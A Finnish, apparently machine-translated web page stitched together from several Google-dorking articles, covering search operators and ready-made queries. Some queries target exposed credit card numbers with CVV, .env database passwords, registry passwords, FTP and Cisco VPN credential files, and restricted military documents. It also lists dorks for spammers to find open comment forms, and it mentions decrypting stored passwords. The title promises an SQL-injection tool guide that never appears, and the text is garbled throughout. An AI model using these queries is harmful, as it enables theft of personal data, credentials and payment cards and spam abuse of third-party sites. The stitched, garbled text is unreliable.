Ohjeet jSQL Injectionin käyttämiseen, monitoimityökaluun SQL-injektioiden löytämiseen ja hyödyntämiseen Kali Linuxissa. Googlen vähän tunnettujen ominaisuuksien käyttäminen piilotettujen asioiden löytämiseen Googlen käyttäminen CGI-skannerina

Yksityisten tietojen hankkiminen ei aina tarkoita hakkerointia - joskus se julkaistaan julkinen pääsy. Tietoa Google-asetukset ja pieni kekseliäisyys antaa sinun löytää paljon mielenkiintoisia asioita - luottokorttien numeroista FBI-asiakirjoihin.

VAROITUS Kaikki tiedot on tarkoitettu vain tiedoksi. Toimittajat tai kirjoittaja eivät ole vastuussa tämän artikkelin materiaalien mahdollisesti aiheuttamista haitoista.

Nykyään kaikki on kytketty Internetiin, eikä pääsyn rajoittamisesta ole juurikaan huolta. Siksi monet yksityiset tiedot tulevat hakukoneiden saaliiksi. Hämähäkkirobotit eivät enää rajoitu web-sivuille, vaan indeksoivat kaiken Internetissä olevan sisällön ja lisäävät jatkuvasti ei-julkista tietoa tietokantoihinsa. Näiden salaisuuksien selvittäminen on helppoa - sinun tarvitsee vain osata kysyä niistä.

Etsitään tiedostoja

Osaavissa käsissä Google löytää nopeasti kaiken, mitä ei löydy Internetistä, esimerkiksi henkilökohtaiset tiedot ja tiedostot viralliseen käyttöön. Ne ovat usein piilossa kuin avain maton alle: todellisia pääsyrajoituksia ei ole, tiedot vain ovat sivuston takaosassa, jonne mikään linkki ei johda. Googlen tavallinen verkkokäyttöliittymä tarjoaa vain Perus asetukset tarkennettu haku, mutta nämäkin riittävät.

Voit rajoittaa Google-haun tietyntyyppisiin tiedostoihin käyttämällä kahta operaattoria: filetype ja ext . Ensimmäinen määrittää muodon, jonka hakukone määritti tiedoston otsikosta, toinen määrittää tiedoston tunnisteen, riippumatta sen sisäisestä sisällöstä. Kun haet molemmissa tapauksissa, sinun tarvitsee vain määrittää pääte. Aluksi ext-operaattoria oli kätevä käyttää tapauksissa, joissa tiedostolla ei ollut tiettyjä muotoominaisuuksia (esimerkiksi ini- ja cfg-asetustiedostojen etsimiseen, jotka saattoivat sisältää mitä tahansa). Nyt Googlen algoritmit ovat muuttuneet, eikä operaattorien välillä ole näkyvää eroa - tulokset ovat useimmissa tapauksissa samat.


Tulosten suodatus

Oletuksena Google etsii sanoja ja yleensä kaikkia syötettyjä merkkejä kaikista indeksoiduilla sivuilla olevista tiedostoista. Voit rajoittaa hakualuetta ylätason verkkotunnuksen, tietyn sivuston tai hakusekvenssin sijainnin mukaan itse tiedostoissa. Käytä kahdessa ensimmäisessä vaihtoehdossa sivuston operaattoria ja sen jälkeen verkkotunnuksen tai valitun sivuston nimeä. Kolmannessa tapauksessa koko joukko operaattoreita mahdollistaa tietojen etsimisen palvelukentistä ja metatiedoista. Esimerkiksi allinurl löytää annetun linkin itse linkkien rungosta, allinachor - tagilla varustetusta tekstistä , allintitle - sivujen otsikoissa, allintext - sivujen rungossa.

Jokaiselle operaattorille on kevyt versio lyhyemmällä nimellä (ilman etuliitettä all). Erona on, että allinurl löytää linkit kaikista sanoista, ja inurl löytää linkit vain ensimmäiseen. Kyselyn toinen ja sitä seuraavat sanat voivat esiintyä missä tahansa web-sivuilla. Inurl-operaattori eroaa myös toisesta operaattorista, jolla on samanlainen merkitys - site. Ensimmäisen avulla voit myös löytää minkä tahansa merkkijonon linkistä haettuun asiakirjaan (esimerkiksi /cgi-bin/), jota käytetään laajalti sellaisten komponenttien etsimiseen, joissa on tunnettuja haavoittuvuuksia.

Kokeillaan käytännössä. Otamme allintext-suodattimen ja pyydämme tuottamaan luettelon luottokorttien numeroista ja vahvistuskoodeista, jotka vanhenevat vasta kahden vuoden kuluttua (tai kun niiden omistajat kyllästyvät ruokkimaan kaikkia).

Allintext: kortin numero viimeinen voimassaolopäivä /2017 cvv

Kun luet uutisista, että nuori hakkeri "murtautui" Pentagonin tai NASA:n palvelimille ja varasti turvaluokiteltua tietoa, puhumme useimmiten juuri sellaisesta Googlen perustekniikasta. Oletetaan, että olemme kiinnostuneita NASAn työntekijöiden luettelosta ja heidän yhteystiedoistaan. Varmasti tällainen luettelo on saatavilla sähköisessä muodossa. Mukavuussyistä tai valvonnan vuoksi se voi olla myös itse organisaation verkkosivustolla. On loogista, että tässä tapauksessa siihen ei ole linkkejä, koska se on tarkoitettu sisäiseen käyttöön. Mitä sanoja tällaisessa tiedostossa voi olla? Vähintään - "osoite" -kenttä. Kaikkien näiden oletusten testaaminen on helppoa.


Inurl:nasa.gov tiedostotyyppi:xlsx "osoite"


Käytämme byrokratiaa

Tällaiset löydöt ovat mukava kosketus. Todella vankan saaliin tarjoaa Googlen verkkovastaaville tarkoitettujen operaattoreiden tarkempi tuntemus, itse verkosto ja haettavan rakenteen erityispiirteet. Kun tiedät yksityiskohdat, voit helposti suodattaa tulokset ja tarkentaa tarvittavien tiedostojen ominaisuuksia saadaksesi todella arvokasta tietoa muusta. Hassua, että byrokratia tulee apuun täällä. Se tuottaa vakioformulaatioita, jotka sopivat vahingossa Internetiin vuotaneen salaisen tiedon etsimiseen.

Esimerkiksi Yhdysvaltain puolustusministeriön vaatima Distribution Statement -leima tarkoittaa standardoituja rajoituksia asiakirjan jakelulle. Kirjain A tarkoittaa julkisia tiedotteita, joissa ei ole mitään salaista; B - tarkoitettu vain sisäiseen käyttöön, C - ehdottoman luottamuksellinen ja niin edelleen F-kirjain asti. Kirjain X erottuu erikseen, mikä merkitsee erityisen arvokasta, korkeimman tason valtiosalaisuutta edustavaa tietoa. Antakaa päivystystyöntekijöiden etsiä tällaisia ​​asiakirjoja, ja rajoitamme tiedostoihin, joissa on kirjain C. DoDI-direktiivin 5230.24 mukaan tämä merkintä on annettu asiakirjoille, jotka sisältävät kuvauksen kriittisistä tekniikoista, jotka kuuluvat vientivalvontaan. . Löydät tällaisia ​​huolellisesti suojattuja tietoja Yhdysvaltain armeijalle osoitetun ylätason domain.mil-sivustoilta.

"JAKELUILMOITUS C" inurl:navy.mil

On erittäin kätevää, että .mil-verkkotunnus sisältää vain Yhdysvaltain puolustusministeriön ja sen sopimusorganisaatioiden sivustoja. Hakutulokset verkkotunnusrajoituksella ovat poikkeuksellisen puhtaita, ja otsikot puhuvat puolestaan. Venäläisten salaisuuksien etsiminen tällä tavalla on käytännössä hyödytöntä: domains.ru:ssa ja.rf:ssä vallitsee kaaos, ja monien asejärjestelmien nimet kuulostavat kasvitieteellisiltä (PP "Kiparis", itseliikkuvat aseet "Akatsia") tai jopa upeilta ( TOS "Buratino").


Kun tutkit huolellisesti mitä tahansa asiakirjaa .mil-verkkotunnuksen sivustolta, näet muita merkkejä hakusi tarkentamiseksi. Esimerkiksi viittaus vientirajoituksiin "Sec 2751", joka on kätevä myös mielenkiintoisen teknisen tiedon etsimiseen. Ajoittain se poistetaan virallisista sivustoista, joissa se kerran esiintyi, joten jos et voi seurata mielenkiintoista linkkiä hakutuloksissa, käytä Googlen välimuistia (välimuistioperaattori) tai Internet-arkistosivustoa.

Kiipeäminen pilviin

Vahingossa poistettujen viranomaisasiakirjojen lisäksi Googlen välimuistiin ilmestyy ajoittain linkkejä henkilökohtaisiin tiedostoihin Dropboxista ja muista tietojen tallennuspalveluista, jotka luovat "yksityisiä" linkkejä julkisesti julkaistuihin tietoihin. Se on vielä pahempaa vaihtoehtoisten ja kotitekoisten palveluiden kanssa. Esimerkiksi seuraava kysely etsii tiedot kaikista Verizon-asiakkaista, joilla on FTP-palvelin asennettuna ja jotka käyttävät aktiivisesti reititintään.

Allinurl:ftp://verizon.net

Tällaisia ​​älykkäitä ihmisiä on nyt yli neljäkymmentä tuhatta, ja keväällä 2015 heitä oli paljon enemmän. Verizon.netin sijasta voit korvata minkä tahansa tunnetun palveluntarjoajan nimen, ja mitä kuuluisempi se on, sitä suurempi saalis voi olla. Sisäänrakennetun FTP-palvelimen kautta näet reitittimeen yhdistetyn ulkoisen tallennuslaitteen tiedostoja. Yleensä tämä on etätyöskentelyyn tarkoitettu NAS, henkilökohtainen pilvi tai jonkinlainen peer-to-peer-tiedostojen lataaminen. Google ja muut hakukoneet indeksoivat kaiken tällaisen median sisällön, joten voit käyttää ulkoisille asemille tallennettuja tiedostoja suoran linkin kautta.

Konfiguja katsomalla

Ennen laajaa pilveen siirtymistä yksinkertaiset FTP-palvelimet hallitsivat etätallennustilaa, jossa oli myös paljon haavoittuvuuksia. Monet niistä ovat ajankohtaisia ​​tänäkin päivänä. Esimerkiksi suosittu WS_FTP Professional -ohjelma tallentaa määritystiedot, käyttäjätilit ja salasanat ws_ftp.ini-tiedostoon. Se on helppo löytää ja lukea, koska kaikki tietueet tallennetaan tekstimuodossa ja salasanat salataan Triple DES -algoritmilla minimaalisen hämärtymisen jälkeen. Useimmissa versioissa riittää ensimmäisen tavun hylkääminen.

Tällaisten salasanojen salaus on helppo purkaa WS_FTP Password Decryptor -apuohjelman tai ilmaisen verkkopalvelun avulla.

Kun puhutaan mielivaltaisen verkkosivuston hakkeroinnista, ne tarkoittavat yleensä salasanan hankkimista CMS- tai verkkokauppasovellusten määritystiedostojen lokeista ja varmuuskopioista. Jos tiedät niiden tyypillisen rakenteen, voit helposti osoittaa avainsanoja. Ws_ftp.ini-tiedoston kaltaiset rivit ovat erittäin yleisiä. Esimerkiksi Drupalissa ja PrestaShopissa on aina käyttäjätunnus (UID) ja sitä vastaava salasana (pwd), ja kaikki tiedot tallennetaan tiedostoihin, joiden tunniste on .inc. Voit etsiä niitä seuraavasti:

"pwd=" "UID=" ext:inc

DBMS-salasanojen paljastaminen

SQL-palvelimien asetustiedostoissa nimet ja osoitteet Sähköposti käyttäjät tallennetaan selkeänä tekstinä, ja salasanojen sijasta heidän MD5-hajautustiedostot tallennetaan. Tarkkaan ottaen niiden salauksen purkaminen on mahdotonta, mutta voit löytää vastaavuuden tunnetuista hash-salasana-pareista.

Edelleen on DBMS-järjestelmiä, jotka eivät edes käytä salasanan hajautusta. Minkä tahansa niistä asetustiedostoja voi yksinkertaisesti tarkastella selaimessa.

Intext:DB_PASSWORD tiedostotyyppi:env

Windows-palvelimien tultua määritystiedostojen paikan valtasi osittain rekisteri. Voit etsiä sen haaroista täsmälleen samalla tavalla käyttämällä regiä tiedostotyyppinä. Esimerkiksi näin:

Tiedostotyyppi:reg HKEY_CURRENT_USER "Password"=

Älkäämme unohtako ilmeistä

Joskus on mahdollista päästä turvaluokiteltuihin tietoihin käyttämällä tietoja, jotka avattiin vahingossa ja joutuivat Googlen tietoon. Ihanteellinen vaihtoehto on löytää luettelo salasanoista jossain yleisessä muodossa. Tallenna tilitiedot sisään tekstitiedosto, Word-asiakirja tai sähköisesti Excel-taulukko Vain epätoivoiset ihmiset voivat, mutta heitä on aina tarpeeksi.

Tiedostotyyppi:xls inurl:salasana

Toisaalta tällaisten tapausten ehkäisemiseksi on monia keinoja. Htaccessissa on määritettävä riittävät käyttöoikeudet, korjattava CMS, ei saa käyttää vasenkätisiä skriptejä ja sulkea muita aukkoja. On myös tiedosto, jossa on luettelo robots.txt-poikkeuksista, joka estää hakukoneita indeksoimasta siinä määritettyjä tiedostoja ja hakemistoja. Toisaalta, jos robots.txt:n rakenne jollain palvelimella poikkeaa tavallisesta, tulee heti selväksi, mitä sillä yritetään piilottaa.

Minkä tahansa sivuston hakemistojen ja tiedostojen luetteloa edeltää vakiohakemisto. Koska palvelua varten sen täytyy näkyä otsikossa, on järkevää rajoittaa sen haku intitle-operaattoriin. Mielenkiintoisia asioita löytyy hakemistoista /admin/, /personal/, /etc/ ja jopa /secret/.

Pysy kuulolla päivityksistä

Relevanssi on tässä erittäin tärkeä: vanhat haavoittuvuudet sulkeutuvat hyvin hitaasti, mutta Google ja sen hakutulokset muuttuvat jatkuvasti. On jopa ero "viimeisen sekunnin" suodattimen (&tbs=qdr:s pyynnön URL-osoitteen lopussa) ja "reaaliaikaisen" suodattimen (&tbs=qdr:1) välillä.

Päivämäärän aikaväli Viimeisin päivitys Google ilmoittaa tiedoston myös epäsuorasti. Graafisen verkkokäyttöliittymän kautta voit valita jonkin vakiojaksoista (tunti, päivä, viikko jne.) tai asettaa ajanjakson, mutta tämä menetelmä ei sovellu automatisointiin.

Osoitepalkin ulkoasusta voit vain arvailla tapaa rajoittaa tulosten tuottamista käyttämällä &tbs=qdr:-rakennetta. Kirjain y sen jälkeen asettaa yhden vuoden rajan (&tbs=qdr:y), m näyttää tulokset viimeiseltä kuukaudelta, w - viikon, d - viimeisen päivän, h - viimeisen tunnin, n - minuutille ja s - anna minulle sekunti. Uusimmat tulokset, jotka Google on juuri julkistanut, löytyvät suodattimella &tbs=qdr:1 .

Jos sinun on kirjoitettava näppärä käsikirjoitus, on hyödyllistä tietää, että päivämääräväli on asetettu Googlessa Julian-muodossa käyttämällä daterange-operaattoria. Esimerkiksi näin löydät luettelon PDF-dokumenteista, joissa on sana luottamuksellinen ja jotka on ladattu 1.1.–1.7.2015.

Luottamuksellinen tiedostotyyppi:pdf-päivämäärä:2457024-2457205

Alue on ilmoitettu Julian-päivämäärämuodossa ottamatta huomioon murto-osaa. Niiden kääntäminen manuaalisesti gregoriaanisesta kalenterista on hankalaa. Päivämäärämuunninta on helpompi käyttää.

Taas kohdistus ja suodatus

Sen lisäksi, että hakukyselyssä määritetään lisäoperaattoreita, ne voidaan lähettää suoraan linkin runkoon. Esimerkiksi tiedostotyyppi:pdf-määritys vastaa rakennetta as_filetype=pdf . Tämän ansiosta on kätevää pyytää selvennyksiä. Oletetaan, että tulosten tulos vain Hondurasin tasavallasta määritetään lisäämällä haun URL-osoitteeseen rakenne cr=countryHN ja vain Bobruiskin kaupungista - gcs=Bobruisk. Löydät täydellisen luettelon kehittäjäosiosta.

Googlen automaatiotyökalut on suunniteltu helpottamaan elämää, mutta ne lisäävät usein ongelmia. Esimerkiksi käyttäjän kaupunki määräytyy käyttäjän IP-osoitteen perusteella WHOIS:n kautta. Näiden tietojen perusteella Google ei ainoastaan ​​tasapainota palvelinten välistä kuormitusta, vaan myös muuttaa hakutuloksia. Alueesta riippuen samalla pyynnöllä ensimmäisellä sivulla näkyvät erilaiset tulokset, ja osa niistä voi olla täysin piilossa. Kaksikirjaiminen koodi gl=country -direktiivin jälkeen auttaa sinua tuntemaan olosi kosmopoliittiseksi ja etsimään tietoa mistä tahansa maasta. Esimerkiksi Alankomaiden koodi on NL, mutta Vatikaanilla ja Pohjois-Korealla ei ole omaa koodia Googlessa.

Usein hakutulokset päätyvät sekaviin jopa useiden kehittyneiden suodattimien käytön jälkeen. Tässä tapauksessa pyyntöä on helppo selventää lisäämällä siihen useita poikkeussanoja (joidenkin eteen on asetettu miinusmerkki). Esimerkiksi pankkitoimintaa, nimiä ja opetusohjelmaa käytetään usein sanan Henkilökohtainen kanssa. Siksi selkeämpiä hakutuloksia ei näytetä kyselyn oppikirjaesimerkillä, vaan tarkennetulla kyselyllä:

Otsikko: "Hakemisto /Henkilökohtaisista/" -nimistä -opetusohjelma -pankkitoiminta

Viimeinen esimerkki

Hienostunut hakkeri erottuu siitä, että hän tarjoaa itselleen kaiken tarvitsemansa yksin. Esimerkiksi VPN on kätevä asia, mutta joko kallis tai väliaikainen ja rajoituksin. Tilauksen tekeminen itsellesi on liian kallista. On hyvä, että on ryhmätilauksia, mutta kanssa käyttämällä Googlea On helppoa tulla osaksi ryhmää. Voit tehdä tämän etsimällä Cisco VPN -määritystiedoston, jolla on melko epätyypillinen PCF-tunniste ja tunnistettava polku: Program Files\Cisco Systems\VPN Client\Profiles. Yksi pyyntö ja liity esimerkiksi Bonnin yliopiston ystävälliseen tiimiin.

Tiedostotyyppi: pcf vpn TAI ryhmä

INFO Google löytää määritystiedostoja, joissa on salasanat, mutta monet niistä on kirjoitettu salatussa muodossa tai korvattu tiivisteillä. Jos näet kiinteän pituisia merkkijonoja, etsi välittömästi salauksenpurkupalvelu.

Salasanat tallennetaan salattuna, mutta Maurice Massard on jo kirjoittanut ohjelman niiden salauksen purkamiseksi ja tarjoaa sen ilmaiseksi thecampusgeeks.com-sivuston kautta.

Google suorittaa satoja erilaisia ​​hyökkäyksiä ja penetraatiotestejä. On olemassa monia vaihtoehtoja, jotka vaikuttavat suosittuihin ohjelmiin, suuriin tietokantamuotoihin, lukuisiin PHP:n haavoittuvuuksiin, pilviin ja niin edelleen. Jos tiedät tarkalleen mitä etsit, sen saaminen on paljon helpompaa tarvittavat tiedot(varsinkin sellainen, jota ei suunniteltu julkistettavaksi). Shodan ei ole ainoa, joka ruokkii mielenkiintoisia ideoita, mutta mikä tahansa indeksoitujen verkkoresurssien tietokanta!

Kuinka etsiä oikein käyttämällä google.com-sivustoa

Kaikki varmaan osaavat käyttää Googlen kaltaista hakukonetta =) Mutta kaikki eivät tiedä sitä, jos kirjoitat sen oikein hakulauseke erikoismallien avulla voit saavuttaa etsimäsi tulokset paljon tehokkaammin ja nopeammin =) Tässä artikkelissa yritän näyttää, mitä ja miten sinun on tehtävä, jotta voit etsiä oikein

Google tukee useita tarkennettuja hakuoperaattoreita, joilla on erityinen merkitys tehtäessä hakuja osoitteessa google.com. Tyypillisesti nämä lausunnot muuttavat hakua tai jopa käskevät Googlea tekemään täysin erilaisia ​​hakuja. Esimerkiksi linkki: construct on erikoisoperaattori ja pyyntö linkki: www.google.com ei anna sinulle normaalia hakua, vaan löytää sen sijaan kaikki verkkosivut, joilla on linkki google.comiin.
vaihtoehtoisia pyyntötyyppejä

välimuisti: Jos lisäät kyselyyn muita sanoja, Google korostaa kyseiset sanat välimuistissa olevasta asiakirjasta.
Esimerkiksi, välimuisti: www.verkkosivusto näyttää välimuistissa olevan sisällön sanalla "web" korostettuna.

linkki: Yllä oleva hakukysely näyttää verkkosivut, jotka sisältävät linkkejä määritettyyn kyselyyn.
Esimerkiksi: linkki: www.sivusto näyttää kaikki sivut, joilla on linkki osoitteeseen http://www.site

liittyvät: Näyttää verkkosivut, jotka liittyvät määritettyyn verkkosivuun.
Esimerkiksi, aiheeseen liittyvä: www.google.com listaa samankaltaiset verkkosivut kotisivu Google.

info: Pyydä tietoja: näyttää osan tiedoista, jotka Googlella on pyytämästäsi verkkosivusta.
Esimerkiksi, info:verkkosivusto näyttää tietoa foorumistamme =) (Armada - Adult Webmasters Forum).

Muut tietopyynnöt

define: define:-kysely tarjoaa määritelmän sen jälkeen kirjoittamillesi sanoille, jotka on kerätty useista online-lähteistä. Määritelmä koskee koko syötettyä lausetta (eli se sisältää kaikki tarkan kyselyn sanat).

osakkeet: Jos aloitat kyselyn osakkeilla: Google käsittelee loput kyselytermit osakesymboleina ja linkittää sivulle, joka näyttää valmiita tietoja näistä symboleista.
Esimerkiksi, osakkeet: Intel yahoo näyttää tietoja Intelistä ja Yahoosta. (Huomaa, että sinun tulee kirjoittaa uutissymbolit, ei yrityksen nimeä)

Kyselyn muokkaajat

site: Jos lisäät kyselyyn site:n, Google rajoittaa tulokset kyseiseltä verkkotunnukselta löytämiinsä verkkosivustoihin.
Voit myös etsiä yksittäisten vyöhykkeiden mukaan, kuten ru, org, com jne ( site:com site:ru)

allintitle: Jos suoritat kyselyn allintitle:llä, Google rajoittaa tulokset kaikkiin otsikon kyselysanoihin.
Esimerkiksi, allintitle: google-haku palauttaa kaikki Google-sivut haun perusteella, kuten kuvat, blogi jne

intitle: Jos lisäät kyselyyn intitle:, Google rajoittaa tulokset asiakirjoihin, jotka sisältävät kyseisen sanan otsikossa.
Esimerkiksi, intitle: Liiketoiminta

allinurl: Jos suoritat kyselyn allinurl:lla: Google rajoittaa tulokset kaikkiin URL-osoitteen kyselysanoihin.
Esimerkiksi, allinurl: google-haku palauttaa asiakirjat googlella ja hakee otsikossa. Vaihtoehtoisesti voit erottaa sanat kauttaviivalla (/), jolloin kauttaviivan molemmilla puolilla olevia sanoja etsitään samalta sivulta: Esimerkki allinurl: foo/bar

inurl: Jos lisäät kyselyyn inurl:, Google rajoittaa tulokset asiakirjoihin, jotka sisältävät kyseisen sanan URL-osoitteessa.
Esimerkiksi, Animaation inurl:site

intext: hakee vain määritetyn sanan sivun tekstistä, jättäen huomioimatta otsikko- ja linkkitekstit ja muut asiat, jotka eivät liity. Tästä muokkaajasta on myös johdannainen - allintext: ts. Lisäksi kaikki kyselyn sanat etsitään vain tekstistä, mikä voi myös olla tärkeää, ohittaen linkeissä usein käytetyt sanat
Esimerkiksi, intext: foorumi

päivämääräalue: hakee aikakehyksen sisällä (päivämäärä:2452389-2452389), aikojen päivämäärät ovat Julian-muodossa.

No, ja kaikenlaisia ​​mielenkiintoisia esimerkkejä kyselyistä

Esimerkkejä kyselyjen kirjoittamisesta Googlelle. Roskapostittajille

Inurl:control.guest?a=sign

Site:books.dreambook.com "Kotisivun URL-osoite" "Allekirjoita" inurl:sign

Sivusto: www.freegb.net kotisivu

Inurl:sign.asp "Character Count"

"Viesti:" inurl:sign.cfm "Lähettäjä:"

Inurl:register.php “Käyttäjän rekisteröinti” “Verkkosivusto”

Inurl:edu/vieraskirja "Allekirjoita vieraskirja"

Inurl:post "Lähetä kommentti" "URL-osoite"

Inurl:/archives/ “Kommentit:” “Muistatko tiedot?”

"Skripti ja vieraskirja Luonut:" "URL-osoite:" "Kommentit:"

Inurl:?action=add "phpBook" "URL"

Otsikko: "Lähetä uusi tarina"

Aikakauslehdet

Inurl: www.livejournal.com/users/ mode=reply

Inurl greatestjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "Vieraskirja"

Blogit

Inurl:blogger.com/comment.g?”postID””anonymous”

Inurl:typepad.com/ "Lähetä kommentti" "Muistatko henkilökohtaiset tiedot?"

Inurl:greatestjournal.com/community/ "Lähetä kommentti" "anonyymien julisteiden osoitteet"

"Lähetä kommentti" "anonyymien julisteiden osoitteet" -

Otsikko: "Lähetä kommentti"

Inurl:pirillo.com "Lähetä kommentti"

Foorumit

Inurl:gate.html?”name=Foorumit” “mode=reply”

Inurl: "forum/posting.php?mode=reply"

Inurl:"mes.php?"

Inurl: "jäsenet.html"

Inurl:forum/memberlist.php?"

Hakkerointi Googlella

Aleksanteri Antipov

Hakujärjestelmä Google (www.google.com) tarjoaa monia hakuvaihtoehtoja. Kaikki nämä ominaisuudet ovat korvaamaton hakutyökalu uudelle Internetiin tutustuneelle käyttäjälle ja samalla vielä tehokkaampi hyökkäys- ja tuhoaseen pahoja aikomuksia omaavien ihmisten käsissä, mukaan lukien hakkerit, myös muut kuin tietokonerikolliset ja jopa terroristeja.
(9475 katselukertaa viikossa)


Denis Barankov
denisNOSPAMixi.ru

Huomio: Tämä artikkeli ei ole toimintaopas. Tämä artikkeli on kirjoitettu sinulle, WEB-palvelimen ylläpitäjille, jotta menetät väärän tunteen olevasi turvassa ja ymmärrät vihdoin tämän tiedonhankintamenetelmän salakavaluuden ja ryhdyt suojaamaan sivustoasi.

Johdanto

Esimerkiksi, löysin 1670 sivua 0,14 sekunnissa!

2. Kirjoita toinen rivi, esimerkiksi:

inurl:"auth_user_file.txt"

hieman vähemmän, mutta tämä riittää jo ilmaiseen lataamiseen ja salasanan arvaamiseen (käyttämällä samaa John The Ripperiä). Annan alla useita muita esimerkkejä.

Joten sinun on ymmärrettävä, että Google-hakukone on käynyt useimmissa Internet-sivustoissa ja tallentanut niiden sisältämät tiedot välimuistiin. Näiden välimuistissa olevien tietojen avulla voit saada tietoja sivustosta ja sen sisällöstä ilman suoraa yhteyttä sivustoon, vain syventämällä Googlen sisällä tallennettuja tietoja. Lisäksi, jos sivuston tiedot eivät ole enää saatavilla, välimuistissa olevat tiedot voidaan silti säilyttää. Kaikki mitä tarvitset tätä menetelmää varten, on tietää joitakin Googlen avainsanoja. Tätä tekniikkaa kutsutaan nimellä Google Hacking.

Tietoja Google Hackingista ilmestyi ensimmäisen kerran Bugtruck-postituslistalle 3 vuotta sitten. Vuonna 2001 ranskalainen opiskelija otti tämän aiheen esille. Tässä on linkki tähän kirjeeseen http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Se tarjoaa ensimmäiset esimerkit tällaisista kyselyistä:

1) Hakemisto /admin
2) /salasana-hakemisto
3) Hakemisto /mail
4) Hakemisto / +banques +filetype:xls (Ranskassa...)
5) Indeksi / +passwd
6) Hakemisto / password.txt

Tämä aihe herätti aaltoja Internetin englanninkielisessä osassa aivan äskettäin: Johnny Longin 7. toukokuuta 2004 julkaistun artikkelin jälkeen. Täydellisen Google-hakkeroinnin tutkimiseksi suosittelen sinua menemään tämän kirjoittajan verkkosivustolle http://johnny.ihackstuff.com. Tässä artikkelissa haluan vain tuoda sinut ajan tasalle.

Kuka voi käyttää tätä:
- Toimittajat, vakoojat ja kaikki ihmiset, jotka pitävät nenäänsä muiden ihmisten asioissa, voivat käyttää tätä etsiessään syyttäviä todisteita.
- Hakkerit etsivät sopivia kohteita hakkerointiin.

Miten Google toimii.

Jatkaksesi keskustelua, haluan muistuttaa sinua joistakin Google-kyselyissä käytetyistä avainsanoista.

Hae käyttämällä +-merkkiä

Google jättää hauista pois sanoja, joita se pitää merkityksettöminä. Esimerkiksi kysymyssanat, prepositiot ja artikkelit Englannin kieli: esimerkiksi ovat, mistä, missä. Venäjän kielellä Google näyttää pitävän kaikkia sanoja tärkeinä. Jos sana jätetään haun ulkopuolelle, Google kirjoittaa siitä. Jotta Google voi alkaa etsiä näitä sanoja sisältäviä sivuja, sinun on lisättävä sanan eteen +-merkki ilman välilyöntiä. Esimerkiksi:

ässä +pohja

Hae merkillä -

Jos Google löytää suuri määrä sivut, joilta haluat sulkea pois tietyn aiheen sivuja, voit pakottaa Googlen etsimään vain sivuja, jotka eivät sisällä tiettyjä sanoja. Tätä varten sinun on ilmoitettava nämä sanat asettamalla merkki jokaisen eteen - ilman välilyöntiä ennen sanaa. Esimerkiksi:

kalastus - vodka

Hae käyttämällä ~

Haluat ehkä etsiä paitsi määritettyä sanaa myös sen synonyymejä. Tee tämä kirjoittamalla sanan eteen ~-symboli.

Tarkan lauseen löytäminen lainausmerkeillä

Google etsii jokaiselta sivulta kaikkia kyselymerkkijonoon kirjoittamiesi sanojen esiintymiä, eikä se välitä sanojen suhteellisesta sijainnista, kunhan kaikki määritetyt sanat ovat sivulla samanaikaisesti (tämä on oletustoiminto). Löytää tarkka lause– se on laitettava lainausmerkkeihin. Esimerkiksi:

"kirjatuki"

Jotta ainakin yksi määritetyistä sanoista näkyy, sinun on määritettävä looginen toiminta selkeä: TAI. Esimerkiksi:

kirjan turvallisuus TAI suojaus

Lisäksi voit käyttää hakupalkin *-merkkiä ilmaisemaan mitä tahansa sanaa ja. edustamaan mitä tahansa hahmoa.

Sanojen etsiminen lisäoperaattoreilla

On hakuoperaattoreita, jotka on määritetty hakumerkkijonossa muodossa:

operaattori:hakutermi

Kaksoispisteen viereen ei tarvita välilyöntejä. Jos lisäät välilyönnin kaksoispisteen jälkeen, näet virheilmoituksen, ja ennen sitä Google käyttää niitä tavallisena hakumerkkijonona.
On olemassa ryhmiä muita hakuoperaattoreita: kielet - ilmoittaa millä kielellä haluat nähdä tuloksen, päivämäärä - rajoittaa tuloksia viimeisten kolmen, kuuden tai 12 kuukauden ajalta, esiintymät - ilmoittaa mistä asiakirjasta sinun on haettava rivi: kaikkialla, otsikossa, URL-osoitteessa, verkkotunnukset - hae määritetyltä sivustolta tai päinvastoin sulje se pois hausta, Turvallinen haku- Estä tietyn tyyppistä tietoa sisältävät sivustot ja poista ne hakutulossivuilta.
Samaan aikaan jotkut operaattorit eivät vaadi lisäparametria, esimerkiksi pyyntöä "cache:www.google.com" voidaan kutsua täysimittaiseksi hakumerkkijonoksi, ja jotkut avainsanat päinvastoin vaativat haun. sana, esimerkiksi "site:www. google.com help ". Katsotaanpa aiheemme valossa seuraavat operaattorit:

Operaattori

Kuvaus

Vaatiiko lisäparametrin?

hae vain hakutermissä määritetyltä sivustolta

hae vain asiakirjoista, joiden tyyppi on hakutermi

etsiä sivuja, joiden otsikossa on hakutermi

etsiä sivuja, jotka sisältävät kaikki otsikossa olevat hakutermisanat

löytää sivuja, jotka sisältävät sanan hakutermi osoitteestaan

etsiä sivuja, jotka sisältävät kaikki hakutermi sanat osoitteestaan

Site:-operaattori rajoittaa haun vain määritettyyn sivustoon, ja voit määrittää muutakin kuin vain Verkkotunnus, mutta myös IP-osoite. Kirjoita esimerkiksi:

tiedostotyyppioperaattori: Rajoittaa haun tiettyyn tiedostotyyppiin. Esimerkiksi:

Artikkelin julkaisupäivänä Google voi etsiä 13 eri tiedostomuodosta:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (vk1, vk2, vk3, vk4, vk5, vk, vk, vk)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel(xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word(doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (kirjoitus)
  • Rich Text Format (rtf)
  • Shockwave Flash (swf)
  • Teksti (ans, txt)

Linkin operaattori: Näyttää kaikki sivut, jotka osoittavat määritetylle sivulle.
On luultavasti aina mielenkiintoista nähdä, kuinka monet paikat Internetissä tietävät sinusta. Kokeillaan:

Välimuistioperaattori: Näyttää Googlen välimuistissa olevan sivuston version sellaisena kuin se näytti silloin Google uusin vieraili tällä sivulla kerran. Otetaan mikä tahansa usein vaihtuva sivusto ja katsotaan:

intitle-operaattori: Hakee tiettyä sanaa sivun otsikosta. Operaattori allintitle: on laajennus – se etsii kaikkia määritettyjä useita sanoja sivun otsikossa. Vertailla:

intitle:lento Marsiin
intitle:flight intitle:on intitle:mars
allintitle:lento marsiin

